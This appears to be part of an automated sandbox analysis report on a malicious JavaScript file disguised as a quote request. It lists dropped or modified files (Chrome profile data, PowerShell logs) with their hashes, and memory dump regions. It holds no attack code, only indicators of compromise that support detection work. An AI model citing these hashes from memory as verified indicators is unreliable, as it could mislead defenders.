                                8841ab718e7d34ac41355a543ff387e7ac9b86c6

                                SHA256

                                b1ce20dd1c4787c4ee189a0d568715c719e49aecbd4a1053838eddaf04d9026e

                                SHA512

                                2493ba7a70349ddda33aeb98443705d79d1ab6f6acd43dde6429af516b5fb02613af56d4adca5782376fb49a0e5f4ecc013939b519b31754e4bc2dc4a6fd22da

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                92d471298f0fb24111dfad52380b48e6

                                SHA1

                                da0814f9b02e0818808af3f2cef295b6b1cfc7a9

                                SHA256

                                f7971bf97d246ab696d7fcad954b66a96fbe128403d74f609d1f263671e65804

                                SHA512

                                e1b61db493cb48c204338a2400ad1338e72a4402a0efeeb18d284cbee8663d8bea337aa1619f53f49e7fbc560cd7837e00dc4742a6f7e7012bdfdd027f8779cc

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                185446cb2dc92f07f66c5cec9f993f71

                                SHA1

                                30f31fbe2fbcc03ff976d9d235cefed66b91d49e

                                SHA256

                                157beeb6aeb1addde72d9b75f7014b35b379460e255b122ba41d6a7cd5d70fef

                                SHA512

                                2142c85225026103d674c494b30eb90192ea607b5330b596722ca2ff21f190e3da376d6242aeeccf820fc087e0e6c299cabb4fb76b7c5b4d8b9e625a141cd34a

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                7e8a0cdff19d302f04e8c996ecab64bd

                                SHA1

                                f55efa7d67f7b7a1f10dcf1c51093b1b8a69b732

                                SHA256

                                adb584f0a94ba23aad5f9f859e7e19272e16b752f770a33ac4eebd668f04884b

                                SHA512

                                3b75732b932d233e36faa9dcd79991af16fde9f6d694aa9df39c126c34f3f60ceb06730d0bec0fb9c54b5e2e4fe3bfd63a9c38e0f057ab191a2ffb3db1aad829

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                56ede24c52db83be4fc74f0f8bd9b18f

                                SHA1

                                c42b0e3b264efcc70c6946289221b96c8b265dbc

                                SHA256

                                98ebc2e63de45bcc7c8d027b05853d807096d32dc528391d138f91eee992b581

                                SHA512

                                09e71b1a4984f5cbb6dbb054bedd1482611ca64211c41f151bf8e9935c51f70e703ceee6bba81b5cdec3bb93cacff7b25921144af8122c3fa49642216e6502f4

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                9bf093eddbb4ab440d6e277b6c30e6bb

                                SHA1

                                60ceb5564a62f4a4d37c6ca80a712243e994eb0a

                                SHA256

                                fdc8a34de3093cd9b78ee07498aecf776047b60a9739d262e6391939a53614a3

                                SHA512

                                2b5412f77cbb451a40d71e43a854117dfa81fba30ba4c8214810195b22cfff18ff01090eb6d57312ca52e03e04491bec907518ef5ab593bcdde60f61b723f2ec

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                850f8d4d747f2917d54702e984640acc

                                SHA1

                                19fd7efeadef1793eb1c2ffa75036b9051eea559

                                SHA256

                                1e3b83d24ad23991874729e4ba60ffe7ae0037dc4a514eb18af3cc526c673733

                                SHA512

                                297aab3ee48e0d2e46a876d1e6a0200c00b905cb25148b7bd7ecd1d7f5f1dc3581c6f42af6fc8ef8fe6d3773aad1bcb4e04eaacd0968be9d661b3f60804fead4

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                a5244b3456b8e8d70cb2a2f7c2d91fe9

                                SHA1

                                fc1a85a5eaa342f0e3c6fa9eddb165e7b9252924

                                SHA256

                                7097139a0affbe264bad49d1fba2916818c1901b13a639f8f350ecbb44b3648d

                                SHA512

                                d9ea2ef71babd97c1c6ac9e9fd412c4a3124763cd44cce0e1d0a034ed288f852356c3da4727bdf4df0f91cf7a27160dde00822bcb97591d891d064a7d5b68c47

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                ff89239cc320a4c63c4a2c8c3c375977

                                SHA1

                                77a911ad826b8b7941ef998d650caf71f9a2a931

                                SHA256

                                450923ff5c17fc342c41f077546395c158248eed8da39ae1190fa9366256e8f3

                                SHA512

                                97cc5681624de5bc07913de1691abc087629fe7277d3fa9f9548ea5f24e1df89d57dca8d597e20654b5e362226d5658c1b7df98a5206079833319dcb2c216c83

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                8293f9382a8c4002f1424f02685188c3

                                SHA1

                                8f05dd088ace8b7436498b7a799681352530cb03

                                SHA256

                                fd3cd47f131a6125b5f0fb996690a84037a121e3405b3e4cd08ed7fd5e9420c1

                                SHA512

                                843fee90da30bb96f789b2f1a4eb6104941c863e0d37a653082cd39681a4c4837ef85d921a6edfaa29757daf9957c7fc91889a2ccc4772ecc69ff3ce8273807a

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                c212637f07f828edb0fc6ae320604c98

                                SHA1

                                e1fac8f7e322fe395d6b1ee2fa17be1674afce24

                                SHA256

                                22650eafde5c08b37193701cef8c3e8da96a30659650c46aa20b4acb30a0d785

                                SHA512

                                eda4488dd403006ba5cb1bad94ccf0b188ded295fa83c28400d82b635e983168aa1f21ef4e73a2b70472de00ac0a2f2caa0e385c27fe72aa216ffbbbc8dd2873

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                f038f445676116233ad08902860ab3d3

                                SHA1

                                be6952531028df5f3d3a7a08d4cec73ecc363939

                                SHA256

                                3a138f224aad410ec83dd0815aefbc5d6000d5905427b90e077beff4262e501a

                                SHA512

                                ece4c2d289430e9feee8252bea2d262ca0b658ccbcfc5505a9a978a3769a160e9f16ab34b73039dd9a414d0d7533607dce62e3fa0b48c38f2dd7731bfaa6575d

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                8KB

                                MD5

                                59ad266a6822ec1dd0099c579e351d8a

                                SHA1

                                c3df0f0bef7cc31f3a22e56024965879d68cd425

                                SHA256

                                77737b9aeef65410f3f09cfe4d5342148bf89c6a8aae4e70f373675725f87fec

                                SHA512

                                1697f9ca83ba0a5e2a25c35d8c3413711726a1104ed4bb4ac87c26325d4f7a1570f59e40943caa3d150926c71550d7b582b8b90ec0053393353e141f69b33202

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                a93903a7451436e68c940f651063057c

                                SHA1

                                994b288f356917c8f7491ac730e02e7017a6c9c6

                                SHA256

                                22a113ee1ebba5efb074a6a9d810a205ad25d28ff65ebe17a524045098fcf896

                                SHA512

                                935d7c82561543938a5e5068e3d2d17e95b24e37784aeea8b6de7b9bac6ecf6ae0670b44e6b1886a7594f6cc89c93313d9451c3c4f56cfaa18b5710ea6cbfc0e

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                7dc323d3da0f54a77685bbd49aa076ff

                                SHA1

                                3017cfbd94762dae66572cb85ba366a25b2c3f48

                                SHA256

                                4eb5fc150946fe6d1e29abd9df5c76a97acfdee0b409d738ec7fadbe05766993

                                SHA512

                                aa3ecf046aad5e73201c179dd29a587021815d3572c42ecae20d8701cf0352105119c84f03bcbaa26ba4ff13d4765accb169fa1c6eb479bca485ea3a19381649

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                a1a92331dea7806a5cd3eb8ea45973b1

                                SHA1

                                92bc4c3478ab7e0a4d111e4ebbb565b1e55cb1fc

                                SHA256

                                b7828ea0eeebec3483e6f71c42cf9cb24669579676cf88f1e736019d8c2ac3a1

                                SHA512

                                0b7710015f282c2d54fdc1e7a4f17cb288526ae2f0cc38d941872b35f2a7caf27fa618a595da573de4a1fbc2ea89369526a647c6f7af257355e21ba0a78ac09a

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                b325e3f07173c732f9a0a9a7a18a84a7

                                SHA1

                                809ee707bbca6f1491bd15f9e6e472182dfd0687

                                SHA256

                                338a363b10c4c5bf40db50395a44db2aad40463b7c2b48703797f75f19f498b6

                                SHA512

                                afcccffcc70b48d4abc5818a559ed457a1b44319bf751b30568aad82c23a57f4948b01c8974c79be2418fe5f887f4033926e596d91c31db3574f91a83cb394d1

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                b65e61f4fdcc8a436a36d6aa206644c3

                                SHA1

                                288af993185990aeac830d9bb6c01101ae922e8c

                                SHA256

                                53344010187a23e433b02ed8e0afbb255326a9006108115a4ce4839a680ce99c

                                SHA512

                                05d48113b1d8392f73dfb65f4a72b6dfb75f0e30de0d00c4a7e0d2cfce5211c301d10732782ceca42d4518f7fbce0365769b38c048b2298e91cd4d6831101f80

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                3ec233f5e97f33c1cb6e550d3ec9b6bb

                                SHA1

                                ad1902c926f0565e8ce93a05ad5fe63c3f0b8af0

                                SHA256

                                f9f3c0e1205f1dc06ff5df93791a41c94fb0d1ce2bc1cc42d713a6d5fc9ab1a1

                                SHA512

                                7502151ffda65d34b00303373daf57a623512516bffa6cbd97c932be1052766c85db238dd9a54f56b1d7ee99bec8f720c9425d925014cb1be3bdf66d6bcc1c59

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                b04ae1506ba56ceac66b40ff82a2acb1

                                SHA1

                                df0a59b521b3dc67869b2a512afdd17e11693769

                                SHA256

                                d642ee2f62669b9a5b284ffc7b14ffbb6575dda2b4447b9da6acb127b2653693

                                SHA512

                                679321412aec61f5e4a17b362f4bde9e1d6456c096cec58dc13c50ab566912179a431bbe2a4ab930506c1063521cb6ab8bda5d4edb350e7f41b94eca11e4819d

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                56224261fa0fd49a064dd022829642c6

                                SHA1

                                b78c809939d366732fcc5bb6be06ce27585659cd

                                SHA256

                                1b6213ac3772c5c4cbcb00630ecb9cb23a4cf26cf3cbff2a09b331407657751f

                                SHA512

                                39b79afc5278c440146f16f52bc78f466c05c6b63a2635a524ec58ae44eed99e50e2c36874fd2a7b88d0fdaff3ec561600c964a7739f38f55010ad43b0201ed9

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                9db5676870b9c97ce87965f36e88639a

                                SHA1

                                9e16a6913f862706c4a01bee66bdc40334e29e44

                                SHA256

                                5af8c69b59892101a45be70cfea04f2795f9a45cdcdd6ef3605e851e10dd810a

                                SHA512

                                978f878ce84d796396cd9426ebc1f05b3035793ae6eca81e45c8f94a1fccafbd2be903ef6c4a4609c69fbcaee98b52822b1de7026f7450ba9dbd84fd4e4420cf

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                a21f4588849e1e9f1a249cfb5b507a22

                                SHA1

                                794b716d14379fd8c790921d2f9b1a8b739ea8a7

                                SHA256

                                170669b49d54462760208792bce5293cc31ec0ab9baefbd6e1b110d1b5f3833f

                                SHA512

                                d424279e4fd6437325282bf64e857a5830ae86b59593a685045cccc7a68d52c126d7914dc2e602cd056a258002cb81094214e8cd0549f35737fc977e43f354df

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                0dc92d0737fc6d94af52f85e5197960c

                                SHA1

                                b03712d05b3e39f8e10196a847b14acad88e6663

                                SHA256

                                912f8bdc396f482a545c8bd5e0090e3cd3cf0bb28cf574adbd1268eab839001b

                                SHA512

                                6c097b3d0f03df1ea060edc0db25bd0890303826ed90eecd6a277c04d686d8cf25823aee2d8f90bc8f6f8d91eeea91953702b3c75e368dc217d7f5d4ea7d7cb4

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                Filesize

                                9KB

                                MD5

                                211063262542cbfcf73b3cbf3514382c

                                SHA1

                                1163c98129f7d4dcdfaf113e59a4256b67ee2d7f

                                SHA256

                                056feb220a1df3285c0467dcac739a05a836d6e447bdd4eb3cd1504463ebc660

                                SHA512

                                380f1223004ec9233542bbd9971350edeb7aabcc95d944915db9b4b5c722f2a1c16bb3b73b86ca956276ec625cfd5217b915f626868ac64c92a801e466312725

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                Filesize

                                112KB

                                MD5

                                07c0d70cc4ec5facc98e3d6728356d04

                                SHA1

                                aca9e5167388a30adf26d6c488eb906a38c2329f

                                SHA256

                                77f4ee2c5386849b7d4386533887ed23977aa14dc78f48cf3a531537c3ad70c8

                                SHA512

                                be2492835573337e06f832c71473c1b43516e02abae07231ba605c7aa3790ce0ab8b6ba94ac54c89ce122206f9f8f549d7f275e5f27bd1ff4b2ef01cb779c2d1

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                Filesize

                                113KB

                                MD5

                                03c7dab00d528ba4be026ae6b930741f

                                SHA1

                                1a97d033502f9fd0a5f869a5f33987139f6d4aac

                                SHA256

                                6342d632eece2715c48f5b4a0a5e62820dcc82aca6bae8126456cf0ae8954c5b

                                SHA512

                                778b816f2ca4840d4970b9b449096e9c96a38c31282fd06d9d3165ebb8fe719b6ed79a283f061415e52b07f97916d955b50c950cd575b77210230151e7a1e291

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                Filesize

                                113KB

                                MD5

                                d5325c2249e584f0c7cc13b2de075769

                                SHA1

                                78961d3ef29d5bbc371b669a95b6e94d17f508f9

                                SHA256

                                1b713a013875fbba7373a0288b6da7c620a54fd3aecabb0673c0194c66336586

                                SHA512

                                f850ab8404d5b3f660abeda5e976ed08bc64742fc34b88b969a5cc88abe79a479444b3e68c1b700cef350768b929befc1aeef0dda3603f7beebe696b42177354

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                Filesize

                                137KB

                                MD5

                                6836c5391fae17ce05da41749ccdebcb

                                SHA1

                                2c066dcfa7facb43ac2e852470aca9edeb4a3be2

                                SHA256

                                27cfe8ab1fa511d8fa5b89d9566472d88d760bdfa813da80159f9af30985cc4a

                                SHA512

                                03754193bb2a4f909121856115d62ff7bd20a1766ec0d46885f0c41f104c8235e114ac884f58d74bd76f1e9a311f95670c3a9984c60835d7df3bba53896eb300

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                Filesize

                                112KB

                                MD5

                                cf6db579cb9125b7c8e1103a3fcbc701

                                SHA1

                                936a3361940ac9aae7ca5659a31cfd41c746494c

                                SHA256

                                f1ead9f639a3eca51bcae74c76ac8b998ebe0b99ada5bc5cd2ea88498f60c0fd

                                SHA512

                                8a0226bcc4117bd4783cb0e9ae60a9f60d1669c413f7c1ec65bccb44850ebc06d11f122deb1432004426057a5a7676d233cd5e39c92a5a67e3e560d5b8ce1feb

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                Filesize

                                3KB

                                MD5

                                f41839a3fe2888c8b3050197bc9a0a05

                                SHA1

                                0798941aaf7a53a11ea9ed589752890aee069729

                                SHA256

                                224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

                                SHA512

                                2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                64B

                                MD5

                                1a11402783a8686e08f8fa987dd07bca

                                SHA1

                                580df3865059f4e2d8be10644590317336d146ce

                                SHA256

                                9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

                                SHA512

                                5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                64B

                                MD5

                                446dd1cf97eaba21cf14d03aebc79f27

                                SHA1

                                36e4cc7367e0c7b40f4a8ace272941ea46373799

                                SHA256

                                a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                                SHA512

                                a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ibdsegsr.v2v.ps1

                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              • C:\Users\Admin\Downloads\QUOTE_REQUEST_HONG_KONG_CHEMHERE.js

                                Filesize

                                320KB

                                MD5

                                17551e071b20e3dfb493dc64c39ca696

                                SHA1

                                4e608cec8b51e7b518b7ea0131f9582e5055754c

                                SHA256

                                ccee9f0070a33b759d79d79e65e257f49d48a79eead7951a6c257e84e7ce4ae8

                                SHA512

                                84a690ae651fb2a439a7b58d5382840bbc21ece1f368cb3eeb013d926ebfeb9b73b772cc1a4e31a9d61e6f720a0c90a2a906277f34038e53d48add2115a4b4ff

                              • memory/2672-112-0x0000019FAC4A0000-0x0000019FAC4C2000-memory.dmp

                                Filesize

                                136KB

                              • memory/2780-160-0x0000000006D10000-0x0000000006D1A000-memory.dmp

                                Filesize

                                40KB

                              • memory/2780-159-0x0000000006D40000-0x0000000006DD2000-memory.dmp

                                Filesize

                                584KB

                              • memory/2780-158-0x0000000006B00000-0x0000000006B9C000-memory.dmp

                                Filesize

                                624KB

                              • memory/2780-157-0x0000000006A10000-0x0000000006A60000-memory.dmp

                                Filesize

                                320KB

                              • memory/2780-156-0x00000000057B0000-0x0000000005816000-memory.dmp

                                Filesize

                                408KB

                              • memory/2780-155-0x0000000005CF0000-0x0000000006294000-memory.dmp

                                Filesize

                                5.6MB

                              • memory/2780-149-0x0000000000400000-0x0000000000442000-memory.dmp

                                Filesize

                                264KB

                              • memory/4044-148-0x000002B7D9EC0000-0x000002B7DA0CC000-memory.dmp

                                Filesize

                                2.0MB